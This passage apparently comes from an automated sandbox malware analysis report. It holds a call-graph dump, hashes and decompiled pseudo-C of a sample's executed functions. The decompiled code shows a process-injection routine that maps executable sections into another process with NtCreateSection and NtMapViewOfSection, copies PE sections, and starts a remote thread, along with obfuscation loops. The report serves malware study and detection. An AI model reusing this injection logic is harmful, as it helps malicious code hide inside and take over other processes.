calls 8060->8061 8062 410582 setSBUpLow __isleadbyte_l 8060->8062 8061->8062 8062->8057 8474 40bda0 8475 40bdad 8474->8475 8476 4111fd __calloc_crt 2 API calls 8475->8476 8477 40bdc7 8476->8477 8478 4111fd __calloc_crt 2 API calls 8477->8478 8479 40bde0 8477->8479 8478->8479 8420 40fbe3 8421 40fbef __mtinitlocknum 8420->8421 8422 40a322 __getptd 2 API calls 8421->8422 8423 40fbf4 8422->8423 8424 40eaf4 __lock RtlEncodePointer 8423->8424 8427 40fc06 8423->8427 8424->8427 8425 40fc14 __mtinitlocknum 8426 40b69c __amsg_exit RtlEncodePointer 8426->8425 8427->8425 8427->8426 8428 4013e3 8429 4013df 8428->8429 8430 401547 NtDuplicateObject 8429->8430 8439 4013b1 8429->8439 8431 401564 NtCreateSection 8430->8431 8430->8439 8432 4015e4 NtCreateSection 8431->8432 8433 40158a NtMapViewOfSection 8431->8433 8435 401610 8432->8435 8432->8439 8433->8432 8434 4015ad NtMapViewOfSection 8433->8434 8434->8432 8436 4015cb 8434->8436 8437 40161a NtMapViewOfSection 8435->8437 8435->8439 8436->8432 8438 401641 NtMapViewOfSection 8437->8438 8437->8439 8438->8439 8150 40d625 8151 40d62f 8150->8151 8152 40d648 8151->8152 8154 40d5f2 8151->8154 8155 40d5f8 8154->8155 8156 40d603 8155->8156 8158 40c01f 8155->8158 8156->8151 8159 40c02f __getbuf __stbuf __fileno __write_nolock 8158->8159 8160 40c03a 8159->8160 8161 40c152 8159->8161 8162 40c0d2 8159->8162 8160->8156 8163 4124fe __locking 2 API calls 8161->8163 8164 40c0e9 8162->8164 8166 40c106 8162->8166 8163->8160 8165 4124fe __locking 2 API calls 8164->8165 8165->8160 8166->8160 8168 411cb2 8166->8168 8169 411cbe __mtinitlocknum 8168->8169 8170 416660 ___lock_fhandle RtlEncodePointer 8169->8170 8171 411ccf __mtinitlocknum __lseeki64_nolock __lseeki64 8169->8171 8170->8171 8171->8160 8210 40c2e5 8211 40c2f1 __mtinitlocknum 8210->8211 8212 4111fd __calloc_crt 2 API calls 8211->8212 8214 40c312 8212->8214 8213 4111fd __calloc_crt 2 API calls 8213->8214 8214->8213 8215 40c3fa __mtinitlocknum 8214->8215 7864 40e426 7865 40e43e _wcslen 7864->7865 7867 40e436 7864->7867 7870 4111fd 7865->7870 7868 40e462 _wcslen __wsetenvp 7868->7867 7869 4111fd __calloc_crt 2 API calls 7868->7869 7869->7868 7873 411206 7870->7873 7872 411243 7872->7868 7873->7872 7874 415fdb 7873->7874 7875 415fe7 ___sbh_alloc_block _realloc __mtinitlocknum __calloc_impl 7874->7875 7876 416090 RtlAllocateHeap 7875->7876 7878 415fff __mtinitlocknum 7875->7878 7879 40eaf4 7875->7879 7876->7875 7878->7873 7880 40eb09 7879->7880 7881 40eb1b 7879->7881 7885 40ea31 7880->7885 7881->7875 7883 40eb0f 7883->7881 7893 40b69c 7883->7893 7886 40ea3d __mtinitlocknum 7885->7886 7889 40ea59 __mtinitlocknum __malloc_crt 7886->7889 7898 40bd61 7886->7898 7891 40eaf4 __lock RtlEncodePointer 7889->7891 7892 40ea73 __mtinitlocknum 7889->7892 7891->7892 7892->7883 7894 40bd61 __FF_MSGBANNER RtlEncodePointer 7893->7894 7895 40b6a6 7894->7895 7896 40bbb6 __NMSG_WRITE RtlEncodePointer 7895->7896 7897 40b6ae __decode_pointer 7896->7897 7897->7881 7899 40bd68 __set_error_mode 7898->7899 7900 40bbb6 __NMSG_WRITE RtlEncodePointer 7899->7900 7903 40bd97 7899->7903 7901 40bd8d 7900->7901 7902 40bbb6 __NMSG_WRITE RtlEncodePointer 7901->7902 7902->7903 7904 40bbb6 7903->7904 7907 40bbca __set_error_mode _strcat_s __NMSG_WRITE 7904->7907 7905 40bd25 7905->7889 7907->7905 7908 4116ba 7907->7908 7921 40a0cd 7908->7921 7911 411765 __decode_pointer 7911->7905 7914 40a05b __encode_pointer RtlEncodePointer 7915 411723 7914->7915 7916 40a05b __encode_pointer RtlEncodePointer 7915->7916 7917 411738 7916->7917 7918 40a05b __encode_pointer RtlEncodePointer 7917->7918 7919 41174d 7918->7919 7919->7911 7920 40a05b __encode_pointer RtlEncodePointer 7919->7920 7920->7911 7922 40a05b __encode_pointer RtlEncodePointer 7921->7922 7923 40a0d4 7922->7923 7923->7911 7924 40a05b 7923->7924 7925 40a06f __crt_waiting_on_module_handle 7924->7925 7926 40a0c7 7925->7926 7927 40a0bf RtlEncodePointer 7925->7927 7926->7914 7927->7926 8401 40ab66 8402 40a322 __getptd 2 API calls 8401->8402 8403 40ab6e 8402->8403 8404 40a865 ___FrameUnwindToState 2 API calls 8403->8404 8405 40abbe 8404->8405 8406 40abf3 FindHandler 2 API calls 8405->8406 8407 40abdf __mtinitlocknum 8406->8407 8216 40a8e7 8219 40a81c 8216->8219 8220 40a82f 8219->8220 8224 40a83b 8219->8224 8222 40a322 __getptd 2 API calls 8220->8222 8226 40a85a 8220->8226 8221 40a322 __getptd 2 API calls 8223 40a84c 8221->8223 8222->8224 8225 40a322 __getptd 2 API calls 8223->8225 8223->8226 8224->8221 8225->8226 8251 402aa7 8254 4029c0 8251->8254 8252 402ab3 8253 401869 15 API calls 8253->8252 8254->8252 8254->8253 8063 40a46b 8065 40a47b __crt_waiting_on_module_handle 8063->8065 8064 40a5db __mtterm 8065->8064 8079 40b956 8065->8079 8068 40a05b __encode_pointer RtlEncodePointer 8069 40a548 8068->8069 8070 40a05b __encode_pointer RtlEncodePointer 8069->8070 8071 40a558 8070->8071 8072 40a05b __encode_pointer RtlEncodePointer 8071->8072 8073 40a568 8072->8073 8074 40a05b __encode_pointer RtlEncodePointer 8073->8074 8075 40a578 __mtinit __decode_pointer 8074->8075 8075->8064 8076 4111fd __calloc_crt 2 API calls 8075->8076 8077 40a5b2 __decode_pointer 8076->8077 8077->8064 8078 40a1c2 __mtinit RtlEncodePointer 8077->8078 8078->8064 8080 40a0cd _doexit RtlEncodePointer 8079->8080 8081 40b95e __init_pointers __initp_misc_winsig 8080->8081 8082 40a05b __encode_pointer RtlEncodePointer 8081->8082 8083 40a53d 8082->8083 8083->8068 8440 40bfeb 8441 40bff6 8440->8441 8442 40c009 8440->8442 8441->8442 8443 411a36 __flush 2 API calls 8441->8443 8443->8442 7928 40e7ac HeapCreate 7929 40e7d0 7928->7929 8084 40ae71 8085 40ae79 ___BuildCatchObject 8084->8085 8090 40a865 8085->8090 8087 40aeb7 8096 40aacd 8087->8096 8089 40aed8 8091 40a871 __mtinitlocknum 8090->8091 8092 40a322 __getptd 2 API calls 8091->8092 8094 40a891 __CallSettingFrame@12 8092->8094 8108 40a92b 8094->8108 8095 40a912 __mtinitlocknum 8095->8087 8097 40aad9 __mtinitlocknum 8096->8097 8098 40a322 __getptd 2 API calls 8097->8098 8099 40ab04 8098->8099 8100 40a322 __getptd 2 API calls 8099->8100 8101 40ab12 8100->8101 8102 40a322 __getptd 2 API calls 8101->8102 8103 40ab20 8102->8103 8104 40a322 __getptd 2 API calls 8103->8104 8105 40ab2b 8104->8105 8113 40abf3 8105->8113 8107 40abdf __mtinitlocknum 8107->8089 8109 40a322 __getptd 2 API calls 8108->8109 8110 40a930 8109->8110 8111 40a93e 8110->8111 8112 40a322 __getptd 2 API calls 8110->8112 8111->8095 8112->8111 8114 40ac01 8113->8114 8115 40a322 __getptd 2 API calls 8114->8115 8116 40ac07 8115->8116 8117 40a322 __getptd 2 API calls 8116->8117 8118 40ac15 FindHandler 8117->8118 8118->8107 8230 40a8f1 8232 40a89c __CallSettingFrame@12 8230->8232 8231 40a92b ___FrameUnwindToState 2 API calls 8233 40a912 __mtinitlocknum 8231->8233 8232->8231 8255 40a6b2 8256 4111fd __calloc_crt 2 API calls 8255->8256 8257 40a6be 8256->8257 8258 40a05b __encode_pointer RtlEncodePointer 8257->8258 8259 40a6c6 8258->8259 8260 4014b3 8261 4014c4 8260->8261 8262 401547 NtDuplicateObject 8261->8262 8271 401663 8261->8271 8263 401564 NtCreateSection 8262->8263 8262->8271 8264 4015e4 NtCreateSection 8263->8264 8265 40158a NtMapViewOfSection 8263->8265 8267 401610 8264->8267 8264->8271 8265->8264 8266 4015ad NtMapViewOfSection 8265->8266 8266->8264 8268 4015cb 8266->8268 8269 40161a NtMapViewOfSection 8267->8269 8267->8271 8268->8264 8270 401641 NtMapViewOfSection 8269->8270 8269->8271 8270->8271 8172 40c635 8173 40c6af __input_l __decode_pointer __fassign __fileno 8172->8173 8174 40c68f __input_l 8172->8174 8173->8174 8175 40c5e2 RtlEncodePointer __input_l 8173->8175 8176 41051b RtlEncodePointer RtlAllocateHeap __input_l 8173->8176 8177 40c60b RtlEncodePointer RtlAllocateHeap __whiteout 8173->8177 8178 41049a RtlEncodePointer RtlAllocateHeap __input_l 8173->8178 8179 410416 RtlEncodePointer RtlAllocateHeap __input_l 8173->8179 8180 40c5c2 RtlEncodePointer RtlAllocateHeap __hextodec 8173->8180 8181 40c56b RtlEncodePointer RtlAllocateHeap __input_l 8173->8181 8175->8173 8176->8173 8177->8173 8178->8173 8179->8173 8180->8173 8181->8173 8414 40a33c 8416 40a348 __mtinitlocknum 8414->8416 8415 40a406 __mtinitlocknum ___freetlocinfo ___removelocaleref __freefls@4 8416->8415 8417 40eaf4 __lock RtlEncodePointer 8416->8417 8418 40a3cd __freefls@4 8417->8418 8419 40eaf4 __lock RtlEncodePointer 8418->8419 8419->8415

                      Executed Functions

                      Function 004013D8 Relevance: 10.8, APIs: 7, Instructions: 311COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 0 4013d8-4013de 1 4013df-401409 0->1 6 401400-401405 1->6 7 40140c call 40119e 1->7 6->7 9 401411-40142b 7->9 10 401410 9->10 11 40142d-401435 9->11 10->9 12 401437-40143f 11->12 13 4013cc 11->13 17 401441-401447 12->17 18 40145d-40146c 12->18 14 4013b1-4013c5 13->14 15 4013ce-4013d5 13->15 20 401449 17->20 21 40142c 17->21 19 40146d-401472 18->19 22 401474 19->22 23 401457 19->23 24 40149a-4014a5 20->24 25 40144b-401450 20->25 21->1 21->11 22->19 28 401476-401478 22->28 26 401459-40145b 23->26 27 40143c-40143f 23->27 30 401452 25->30 31 4014bb-4014cd 25->31 26->18 27->17 27->18 32 40147a-401482 28->32 33 4014de-4014f1 call 40119e 28->33 30->23 36 4014d2-4014d7 31->36 37 4014cf-4014d1 31->37 39 401484 32->39 40 4014f3 33->40 41 4014f6-4014fb 33->41 36->33 37->36 39->39 40->41 43 401501-401512 41->43 44 401824-40182c 41->44 48 401822 43->48 49 401518-401541 43->49 44->41 47 401831-401842 44->47 51 401845-401866 call 40119e 47->51 52 401838-40183e 47->52 48->47 49->48 59 401547-40155e NtDuplicateObject 49->59 52->51 59->48 60 401564-401588 NtCreateSection 59->60 62 4015e4-40160a NtCreateSection 60->62 63 40158a-4015ab NtMapViewOfSection 60->63 62->48 66 401610-401614 62->66 63->62 65 4015ad-4015c9 NtMapViewOfSection 63->65 65->62 67 4015cb-4015e1 65->67 66->48 68 40161a-40163b NtMapViewOfSection 66->68 67->62 68->48 69 401641-40165d NtMapViewOfSection 68->69 69->48 71 401663 call 401668 69->71
                      Memory Dump Source
                      • Source File: 00000004.00000002.439481290.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_gfgsrbs.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 0770cd10f47575dba946c72a205b39b8d4daa6ec592c66899ecf253aeda9c0e3
                      • Instruction ID: 67db8dc375151bfe257540867c3d287c712409260c0918a2d7cc4bffad82e0fd
                      • Opcode Fuzzy Hash: 0770cd10f47575dba946c72a205b39b8d4daa6ec592c66899ecf253aeda9c0e3
                      • Instruction Fuzzy Hash: 22912472600204ABDB219FA1CC44EEF7BB8EF81B14F10467AFA12BB1F5D6759905CB64
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004014A8 Relevance: 10.7, APIs: 7, Instructions: 176nativeCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 73 4014a8-4014c4 77 4014db 73->77 78 4014cc-4014f1 call 40119e 73->78 77->78 82 4014f3 78->82 83 4014f6-4014fb 78->83 82->83 85 401501-401512 83->85 86 401824-40182c 83->86 90 401822 85->90 91 401518-401541 85->91 86->83 89 401831-401842 86->89 93 401845-401866 call 40119e 89->93 94 401838-40183e 89->94 90->89 91->90 101 401547-40155e NtDuplicateObject 91->101 94->93 101->90 102 401564-401588 NtCreateSection 101->102 104 4015e4-40160a NtCreateSection 102->104 105 40158a-4015ab NtMapViewOfSection 102->105 104->90 108 401610-401614 104->108 105->104 107 4015ad-4015c9 NtMapViewOfSection 105->107 107->104 109 4015cb-4015e1 107->109 108->90 110 40161a-40163b NtMapViewOfSection 108->110 109->104 110->90 111 401641-40165d NtMapViewOfSection 110->111 111->90 113 401663 call 401668 111->113
                      C-Code - Quality: 59%
                      			E004014A8(void* __eflags, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				long _v12;
				void* _v16;
				void* _v20;
				char _v44;
				char _v52;
				long _v56;
				long _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v84;
				char _v88;
				char _v92;
				intOrPtr _v96;
				char _v100;
				void* __ebx;
				void* __edi;
				void* __ebp;
				void* _t84;
				intOrPtr _t87;
				long _t90;
				void* _t91;
				struct _GUID _t98;
				struct _GUID _t100;
				PVOID* _t102;
				PVOID* _t104;
				intOrPtr _t106;
				intOrPtr* _t108;
				PVOID* _t121;
				PVOID* _t123;
				intOrPtr _t127;
				intOrPtr _t128;
				intOrPtr _t129;
				long* _t130;
				signed int _t137;
				int _t138;
				signed int _t157;
				signed int _t158;
				signed int _t159;
				void* _t160;
				intOrPtr* _t161;
				void* _t164;
				void* _t171;
				long _t172;
				intOrPtr _t173;
				void* _t174;
				long* _t180;
				intOrPtr* _t181;
				HANDLE* _t182;
				HANDLE* _t183;
				void* _t188;
				void* _t189;
				intOrPtr* _t192;
				void* _t193;
				intOrPtr _t196;
				intOrPtr* _t197;
				intOrPtr* _t198;
				void* _t200;
				intOrPtr* _t201;
				void* _t202;
				long _t217;

				_t84 = 0x14e3;
				_push(0x37f);
				_t128 =  *_t197;
				_t198 = _t197 + 4;
				L0040119E(_t84, _t128, _t171, __eflags);
				_t127 = _a4;
				_t172 = 0;
				_v56 = 0;
				if(gs != 0) {
					_v56 = _v56 + 1;
				}
				while(1) {
					_t87 =  *((intOrPtr*)(_t127 + 0x48))();
					if(_t87 != 0) {
						break;
					}
					 *((intOrPtr*)(_t127 + 0x1c))(0x3e8);
				}
				_v96 = _t87;
				_t180 =  &_v100;
				 *_t180 = _t172;
				 *((intOrPtr*)(_t127 + 0x4c))(_t87, _t180);
				_t90 =  *_t180;
				if(_t90 != 0) {
					_t130 =  &_v52;
					 *_t130 = _t90;
					_t130[1] = _t172;
					_t181 =  &_v44;
					 *((intOrPtr*)(_t127 + 0x10))(_t181, 0x18);
					 *_t181 = 0x18;
					_push( &_v52);
					_push(_t181);
					_push(0x40);
					_push( &_v20);
					if( *((intOrPtr*)(_t127 + 0x70))() == 0 && NtDuplicateObject(_v20, 0xffffffff, 0xffffffff,  &_v16, _t172, _t172, 2) == 0) {
						_v12 = _t172;
						_t98 =  &_v84;
						 *(_t98 + 4) = _t172;
						 *_t98 = 0x5000;
						_t182 =  &_v88;
						if(NtCreateSection(_t182, 6, _t172, _t98, 4, 0x8000000, _t172) == 0) {
							_push(_v84);
							_pop( *_t25);
							_t121 =  &_v72;
							 *_t121 = _t172;
							if(NtMapViewOfSection( *_t182, 0xffffffff, _t121, _t172, _t172, _t172,  &_v60, 1, _t172, 4) == 0) {
								_t123 =  &_v64;
								 *_t123 = _t172;
								if(NtMapViewOfSection( *_t182, _v16, _t123, _t172, _t172, _t172,  &_v60, 1, _t172, 4) == 0) {
									_t196 = _v72;
									 *((intOrPtr*)(_t127 + 0x20))(_t172, _t196, 0x104);
									 *((intOrPtr*)(_t196 + 0x208)) = _a16;
									_v12 = _v12 + 1;
								}
							}
						}
						_t100 =  &_v84;
						 *(_t100 + 4) = _t172;
						 *_t100 = _a12 + 0x10000;
						_t183 =  &_v92;
						if(NtCreateSection(_t183, 0xe, _t172, _t100, 0x40, 0x8000000, _t172) == 0 && _v12 != 0) {
							_push(_v84);
							_pop( *_t46);
							_t102 =  &_v76;
							 *_t102 = _t172;
							if(NtMapViewOfSection( *_t183, 0xffffffff, _t102, _t172, _t172, _t172,  &_v60, 1, _t172, 4) == 0) {
								_t104 =  &_v68;
								 *_t104 = _t172;
								_t217 = NtMapViewOfSection( *_t183, _v16, _t104, _t172, _t172, _t172,  &_v60, 1, _t172, 0x20);
								if(_t217 == 0) {
									L21();
									if(_t217 == 0 && _t217 != 0) {
									}
									_t200 = _t198 + 4;
									_push(0x2e62);
									_t201 = _t200 + 4;
									_push(0x2260);
									_t106 =  *_t201;
									_t202 = _t201 + 4;
									_t157 = (0x2260 << 5) + _t106;
									asm("lodsb");
									_t158 = _t157;
									asm("loop 0xffffffc2");
									_t159 = _t158 ^ 0xbcc951dd;
									_t198 = _t202 - _t159;
									_t188 = _a8 +  *_a8;
									_t137 =  *(_t188 + 6) & 0x0000ffff;
									_push(_t188);
									_t160 = _t188;
									if(_v56 == 0) {
										_t161 = _t160 + 0xf8;
										__eflags = _t161;
									} else {
										_t161 = _t160 + 0x108;
									}
									_push(_t137);
									_t138 =  *(_t161 + 0x10);
									if(_t138 != 0) {
										memcpy( *((intOrPtr*)(_t161 + 0xc)) + _v76,  *((intOrPtr*)(_t161 + 0x14)) + _a8, _t138);
										_t198 = _t198 + 0xc;
									}
									asm("loop 0xffffffe6");
									_pop(_t189);
									_t222 = _v56;
									if(_v56 == 0) {
										_push(_t189);
										_t164 =  *((intOrPtr*)(_t189 + 0x34)) - _v68;
										_t192 =  *((intOrPtr*)(_t189 + 0xa0)) + _v76;
										__eflags = _t192;
										while(1) {
											__eflags =  *_t192;
											if( *_t192 == 0) {
												break;
											}
											_t173 =  *_t192;
											_t192 = _t192 + 8;
											asm("lodsw");
											__eflags = 0;
											if(0 != 0) {
												 *((intOrPtr*)(0)) =  *((intOrPtr*)(0)) - _t164;
												__eflags =  *((intOrPtr*)(0 + _v76 + _t173));
											}
											asm("loop 0xffffffe9");
										}
										_pop(_t193);
										_t172 = 0;
										__eflags = 0;
										_t108 =  &_v8;
										 *_t108 = 0;
										 *((intOrPtr*)(_t127 + 0x98))(_v16, 0, 0, 0, 0, 0,  *((intOrPtr*)(_t193 + 0x28)) + _v68, _v64, _t108, 0);
									} else {
										L54();
										_pop(_t174);
										_t172 = _t174 - 0x1760;
										 *((intOrPtr*)(_t172 + 0x1794)) = _t172 + 0x2c17;
										L00401227(_t127, _t172, _t222, _t172 + 0x2c17, 0x1ad);
										0x33();
										 *((intOrPtr*)(_t172 + 0x17b9)) = _t172 + 0x2c67;
										0x33();
									}
								}
							}
						}
					}
				}
				_t91 = 0x14e3;
				_push(0x37f);
				_t129 =  *_t198;
				return L0040119E(_t91, _t129, _t172, _t222);
			}


































































                      0x004014bc
                      0x004014cc
                      0x004014d1
                      0x004014d4
                      0x004014de
                      0x004014e3
                      0x004014e6
                      0x004014e8
                      0x004014f1
                      0x004014f3
                      0x004014f3
                      0x004014f6
                      0x004014f6
                      0x004014fb
                      0x00000000
                      0x00000000
                      0x00401829
                      0x00401829
                      0x00401501
                      0x00401504
                      0x00401507
                      0x0040150b
                      0x0040150e
                      0x00401512
                      0x00401518
                      0x0040151b
                      0x0040151d
                      0x00401520
                      0x00401526
                      0x00401529
                      0x00401537
                      0x00401538
                      0x00401539
                      0x0040153b
                      0x00401541
                      0x00401564
                      0x00401567
                      0x0040156a
                      0x0040156d
                      0x00401573
                      0x00401588
                      0x0040158a
                      0x0040158d
                      0x00401590
                      0x00401593
                      0x004015ab
                      0x004015ad
                      0x004015b0
                      0x004015c9
                      0x004015cb
                      0x004015d5
                      0x004015db
                      0x004015e1
                      0x004015e1
                      0x004015c9
                      0x004015ab
                      0x004015e4
                      0x004015f0
                      0x004015f3
                      0x004015f5
                      0x0040160a
                      0x0040161a
                      0x0040161d
                      0x00401620
                      0x00401623
                      0x0040163b
                      0x00401641
                      0x00401644
                      0x0040165b
                      0x0040165d
                      0x00401663
                      0x00401668
                      0x00401668
                      0x00401672
                      0x00401699
                      0x004016a1
                      0x004016c5
                      0x004016c6
                      0x004016c9
                      0x004016e1
                      0x004016f0
                      0x004016f8
                      0x004016fd
                      0x00401706
                      0x0040170f
                      0x0040171b
                      0x0040171d
                      0x00401721
                      0x00401722
                      0x00401728
                      0x00401732
                      0x00401732
                      0x0040172a
                      0x0040172a
                      0x0040172a
                      0x00401738
                      0x00401739
                      0x0040173e
                      0x0040174c
                      0x0040174c
                      0x0040174c
                      0x00401752
                      0x00401754
                      0x00401755
                      0x00401759
                      0x004017c1
                      0x004017c5
                      0x004017d0
                      0x004017d0
                      0x004017d3
                      0x004017d3
                      0x004017d6
                      0x00000000
                      0x00000000
                      0x004017d8
                      0x004017e2
                      0x004017e7
                      0x004017e9
                      0x004017ee
                      0x004017fa
                      0x004017fa
                      0x004017fa
                      0x004017fc
                      0x004017fc
                      0x00401800
                      0x00401807
                      0x00401807
                      0x00401809
                      0x0040180c
                      0x0040181c
                      0x0040175b
                      0x0040175b
                      0x00401760
                      0x00401761
                      0x00401777
                      0x00401786
                      0x00401793
                      0x004017aa
                      0x004017b8
                      0x004017b8
                      0x00401759
                      0x0040165d
                      0x0040163b
                      0x0040160a
                      0x00401541
                      0x0040183d
                      0x0040184b
                      0x00401850
                      0x00401866

                      APIs
                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,?,?,00000002), ref: 00401556
                      • NtCreateSection.NTDLL(?,00000006,?,?,00000004,08000000,?,?,?,00000002), ref: 00401583
                      • NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000004,08000000), ref: 004015A6
                      • NtMapViewOfSection.NTDLL(?,?,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000000,00000001), ref: 004015C4
                      • NtCreateSection.NTDLL(?,0000000E,?,?,00000040,08000000,?,?,?,00000004,08000000,?,?,?,00000002), ref: 00401605
                      • NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000040,08000000), ref: 00401636
                      • NtMapViewOfSection.NTDLL(?,?,?,?,?,?,00000000,00000001,?,00000020,?,?,?,00000000,00000001), ref: 00401658
                      Memory Dump Source
                      • Source File: 00000004.00000002.439481290.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_4_2_400000_gfgsrbs.jbxd
                      Similarity
                      • API ID: Section$View$Create$DuplicateObject
                      • String ID:
                      • API String ID: 1546783058-0
                      • Opcode ID: 2cfc8301c030803b858046a898f5dfafd46e7c9465d39b5d003f99b680b42ab3
                      • Instruction ID: cd3d7ef155730ff18c04e90283d35d9337f0c2e1175127a0e4488d23b7b2eda1
                      • Opcode Fuzzy Hash: 2cfc8301c030803b858046a898f5dfafd46e7c9465d39b5d003f99b680b42ab3
                      • Instruction Fuzzy Hash: B6511871900249BBEB219F91CC48FEBBBB9EF85B10F104129FA11BA2E5D7749941CB64
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004014B3 Relevance: 10.7, APIs: 7, Instructions: 171nativeCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 115 4014b3-4014c4 117 4014db 115->117 118 4014cc-4014f1 call 40119e 115->118 117->118 122 4014f3 118->122 123 4014f6-4014fb 118->123 122->123 125 401501-401512 123->125 126 401824-40182c 123->126 130 401822 125->130 131 401518-401541 125->131 126->123 129 401831-401842 126->129 133 401845-401866 call 40119e 129->133 134 401838-40183e 129->134 130->129 131->130 141 401547-40155e NtDuplicateObject 131->141 134->133 141->130 142 401564-401588 NtCreateSection 141->142 144 4015e4-40160a NtCreateSection 142->144 145 40158a-4015ab NtMapViewOfSection 142->145 144->130 148 401610-401614 144->148 145->144 147 4015ad-4015c9 NtMapViewOfSection 145->147 147->144 149 4015cb-4015e1 147->149 148->130 150 40161a-40163b NtMapViewOfSection 148->150 149->144 150->130 151 401641-40165d NtMapViewOfSection 150->151 151->130 153 401663 call 401668 151->153
                      C-Code - Quality: 63%
                      			E004014B3(void* __ebx, void* __edi, void* __eflags) {
				void* _t84;
				intOrPtr _t87;
				long _t90;
				void* _t91;
				struct _GUID _t98;
				struct _GUID _t100;
				PVOID* _t102;
				PVOID* _t104;
				intOrPtr _t106;
				intOrPtr* _t108;
				PVOID* _t121;
				PVOID* _t123;
				intOrPtr _t128;
				intOrPtr _t130;
				intOrPtr _t131;
				long* _t132;
				signed int _t139;
				int _t140;
				signed int _t161;
				signed int _t162;
				signed int _t163;
				void* _t164;
				intOrPtr* _t165;
				void* _t168;
				long _t176;
				intOrPtr _t178;
				void* _t179;
				long* _t185;
				intOrPtr* _t187;
				HANDLE* _t188;
				HANDLE* _t189;
				void* _t194;
				void* _t195;
				intOrPtr* _t198;
				void* _t199;
				void* _t202;
				void* _t203;
				void* _t205;
				intOrPtr* _t206;
				intOrPtr* _t207;
				void* _t210;
				intOrPtr* _t211;
				void* _t212;
				long _t227;

				_t206 = _t205 + 1;
				_t84 = 0x14e3;
				_push(0x37f);
				_t130 =  *_t206;
				_t207 = _t206 + 4;
				L0040119E(_t84, _t130, __edi, __eflags);
				_t128 =  *((intOrPtr*)(_t203 + 8));
				_t176 = 0;
				 *((intOrPtr*)(_t203 - 0x34)) = 0;
				if(gs != 0) {
					 *((intOrPtr*)(_t203 - 0x34)) =  *((intOrPtr*)(_t203 - 0x34)) + 1;
				}
				while(1) {
					_t87 =  *((intOrPtr*)(_t128 + 0x48))();
					if(_t87 != 0) {
						break;
					}
					 *((intOrPtr*)(_t128 + 0x1c))(0x3e8);
				}
				 *((intOrPtr*)(_t203 - 0x5c)) = _t87;
				_t185 = _t203 - 0x60;
				 *_t185 = _t176;
				 *((intOrPtr*)(_t128 + 0x4c))(_t87, _t185);
				_t90 =  *_t185;
				if(_t90 != 0) {
					_t132 = _t203 - 0x30;
					 *_t132 = _t90;
					_t132[1] = _t176;
					_t187 = _t203 - 0x28;
					 *((intOrPtr*)(_t128 + 0x10))(_t187, 0x18);
					 *_t187 = 0x18;
					_push(_t203 - 0x30);
					_push(_t187);
					_push(0x40);
					_push(_t203 - 0x10);
					if( *((intOrPtr*)(_t128 + 0x70))() == 0 && NtDuplicateObject( *(_t203 - 0x10), 0xffffffff, 0xffffffff, _t203 - 0xc, _t176, _t176, 2) == 0) {
						 *(_t203 - 8) = _t176;
						_t98 = _t203 - 0x50;
						 *(_t98 + 4) = _t176;
						 *_t98 = 0x5000;
						_t188 = _t203 - 0x54;
						if(NtCreateSection(_t188, 6, _t176, _t98, 4, 0x8000000, _t176) == 0) {
							 *_t25 =  *(_t203 - 0x50);
							_t121 = _t203 - 0x44;
							 *_t121 = _t176;
							if(NtMapViewOfSection( *_t188, 0xffffffff, _t121, _t176, _t176, _t176, _t203 - 0x38, 1, _t176, 4) == 0) {
								_t123 = _t203 - 0x3c;
								 *_t123 = _t176;
								if(NtMapViewOfSection( *_t188,  *(_t203 - 0xc), _t123, _t176, _t176, _t176, _t203 - 0x38, 1, _t176, 4) == 0) {
									_t202 =  *(_t203 - 0x44);
									 *((intOrPtr*)(_t128 + 0x20))(_t176, _t202, 0x104);
									 *((intOrPtr*)(_t202 + 0x208)) =  *((intOrPtr*)(_t203 + 0x14));
									 *(_t203 - 8) =  *(_t203 - 8) + 1;
								}
							}
						}
						_t100 = _t203 - 0x50;
						 *(_t100 + 4) = _t176;
						 *_t100 =  *((intOrPtr*)(_t203 + 0x10)) + 0x10000;
						_t189 = _t203 - 0x58;
						if(NtCreateSection(_t189, 0xe, _t176, _t100, 0x40, 0x8000000, _t176) == 0 &&  *(_t203 - 8) != 0) {
							 *_t46 =  *(_t203 - 0x50);
							_t102 = _t203 - 0x48;
							 *_t102 = _t176;
							if(NtMapViewOfSection( *_t189, 0xffffffff, _t102, _t176, _t176, _t176, _t203 - 0x38, 1, _t176, 4) == 0) {
								_t104 = _t203 - 0x40;
								 *_t104 = _t176;
								_t227 = NtMapViewOfSection( *_t189,  *(_t203 - 0xc), _t104, _t176, _t176, _t176, _t203 - 0x38, 1, _t176, 0x20);
								if(_t227 == 0) {
									L20();
									if(_t227 == 0 && _t227 != 0) {
									}
									_t210 = _t207 + 4;
									_push(0x2e62);
									_t211 = _t210 + 4;
									_push(0x2260);
									_t106 =  *_t211;
									_t212 = _t211 + 4;
									_t161 = (0x2260 << 5) + _t106;
									asm("lodsb");
									_t162 = _t161;
									asm("loop 0xffffffc2");
									_t163 = _t162 ^ 0xbcc951dd;
									_t207 = _t212 - _t163;
									_t194 =  *((intOrPtr*)(_t203 + 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t203 + 0xc))));
									_t139 =  *(_t194 + 6) & 0x0000ffff;
									_push(_t194);
									_t164 = _t194;
									if( *((intOrPtr*)(_t203 - 0x34)) == 0) {
										_t165 = _t164 + 0xf8;
										__eflags = _t165;
									} else {
										_t165 = _t164 + 0x108;
									}
									_push(_t139);
									_t140 =  *(_t165 + 0x10);
									if(_t140 != 0) {
